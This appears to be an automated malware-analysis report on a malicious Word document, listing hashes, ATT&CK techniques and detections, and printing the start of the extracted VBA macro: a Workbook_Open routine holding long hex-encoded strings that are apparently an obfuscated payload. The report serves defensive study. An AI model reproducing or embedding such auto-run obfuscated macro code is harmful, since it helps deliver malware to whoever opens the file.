Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e0246e25f267a86…

MALICIOUS

Office (OLE)

94.0 KB Created: 2018-02-22 07:51:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 7c9b683835d9a17ffd68b9b31ad8d54f SHA-1: f856b0a21ae9b86c79f78dfa33b523b888bb7544 SHA-256: 3e0246e25f267a8673a55876b042f20bee8f1abd8ec631f65986bef6ce6566d8
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Workbook_Open macro that utilizes the Shell() function, indicating it's designed to execute arbitrary code. The presence of a 'macros.bas' file and ClamAV detection as 'Xls.Malware.Cwsp-6735643-0' strongly suggests malicious intent. The script likely downloads and executes a second-stage payload, a common technique for malware delivery.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8800 bytes
SHA-256: b5d720f3975f0ec8ab6407088366f41382e43068f14233af14c047056fdc020e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub Workbook_Open()
Dim KLY_VY As String
KLY_VY = "797279B48D797979A4798B798379A66190797F797D4B799479837979727979987988796EB54783AB793B794D7962797964933A7961799CA279797972796B534079AE7979795D717955797B7979797979797979477178797FAE79864B7979799B797979B270795346795B797A533A7979757EB0778D799E777F79799"
Dim PH_FJH As String
PH_FJH = "43B795C6579794A797979658A799D6D7986AD7953797A535D7B79757979793D7979897979797985794B3D5C3A4379795279797979797979A97955A179873D797979B179797952794B77896CA879AE796A5357B2797979B679796A54A67959B65F7960B95A8A79797A794F79827979795679A0A579797A797679B679"
Dim HU_J As String
HU_J = "79794C46795379798B7144797958798F61A8796F5079797979924279815EA979797979AF75A04F6E798779797979A98E7079AB798D7949798B6482AD7955B4613F79637998793A794E866D747979A94A7079797C797A797979757979426B7079537979657679797979796E79A79DB4793E7979B679808A8C7466AD7"
Dim GG_AE As String
GG_AE = "96E794654799A7947797D799579AD79464D997979567990877979798C797949554A79437953794679A6797979765B59799C7F60797979524279797DB83B796D8C05854CA46E796F8D798F6279B14A797979797D797C6978793B3E877979797979A854797946A2688D79B479B67947777979793B79797996469EA26A"
Dim U_X As String
U_X = "797979A379A379979AF0797979797974F8797979797979798E7979797991797979797996793FA4453B79795C8379AFA44E79797979797945794779797C794D797972AD796E42795B79796F796C793B797979797979537979558A79797982796979AD98A73C797962797979AC7979B045476879798C7979877979795"
Dim Y_BN As String
Y_BN = "2798879483F73795C797949794779796D56A071B0B37979534E988DAD7959A17979798FA78D79A679558EB1795879A646796B6E79A77979B17979798479AE5A8F79797C7979977979955FAE7B795D7979A179796D617979A87979797979793D9E796E79B179797974404CB3AC80B67946877979676979793D796D79"
Dim ZH_MUN As String
ZH_MUN = "A1AA796B79955B796A54795BB5AA79799979B07950B8B0793F797979754177794C3CA38479653DB0A479467964793C7979B48B798B79A07979B879AF7979797998796E4F424184794D79798BB279795179797979794A3D79797979423B793C627979797979AD4079797979417978795298859F794379796B9A45477"
Dim FN_ZC As String
FN_ZC = "979B9A07979794E797953796F496B58799E7979797A796C796979796779A0A3794D919E794179793E7992854A79794C79798B79797981796E79B579B1959779B79B7979469763687979798B5B797A79B3794F7979514979A6665079B3797979AC797992798261AF406899794C79797979A97979B9797972796B4C8F"
Dim HS_XVQ As String
HS_XVQ = "978D7979A9499C6B79798A797979946E76627979797979794D5A41514E5A7979AC79797988794879A1797953817F79796679799C7979B79B894B99796A6D48785279AD79797983AD8879797979547879795949547945A279797D767971AA797969A88B9C8D796C79AE7A6879907243AD79768279687941794479747"
Dim RXK_BBS As String
RXK_BBS = "F79AB76797957798D79794C79A879797979AC737978796279796BA17992B27979563D3E8A797279797979796F3B7991B179886C7945796C7B7979AAB279527961AE798B79797979A979597997797979797979438079799A79795479507973AF793BA8797971B2797979797979797965B4795879797979797982796B"
Dim HI_EW As String
HI_EW = "79B7603D797979799379597979867EB2799F79795C79B8795D817955507946A27979793FB079AF7996797965797950AA9C8F7963798E4950797F79A879A27979797982B2783C79797971AE588C68736A8579797979797979406A54414E797974AD794079795D8C53737956797979517977797953797979767972797"
Dim KZZ_PB As String
KZZ_PB = "9797D7979796C6C9C8D79A879637979799352AE797D7979795D794177799A8A7979794D7979AD79705479796479797979797E586F3A798B7949A395507979A1926E7979796D3A798D624879AEAD5061814579566C79794BC87944B95AAA79B179B53B797D8E797D69797979F28C6D795F8560AF797979799779AA6D"
Dim BZK_F As String
BZK_F = "798A7679794F6F3E797C793C793B725E797479858B7965793F63518E916187797959799B63797679797979AD5E797979745D785E79794A79797957799955797D68791379B587797979A88CAE79573E48797972798B6B798B795579797979A37979407979797995793E91AA7979795F7B50B6799C7979ABA17964A6A"
Dim Y_L As String
Y_L = "59979793E987979B5B38579AA74797979657970798179A47040844C79737979A479507979B9746279796B7979A94FB27979AB
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.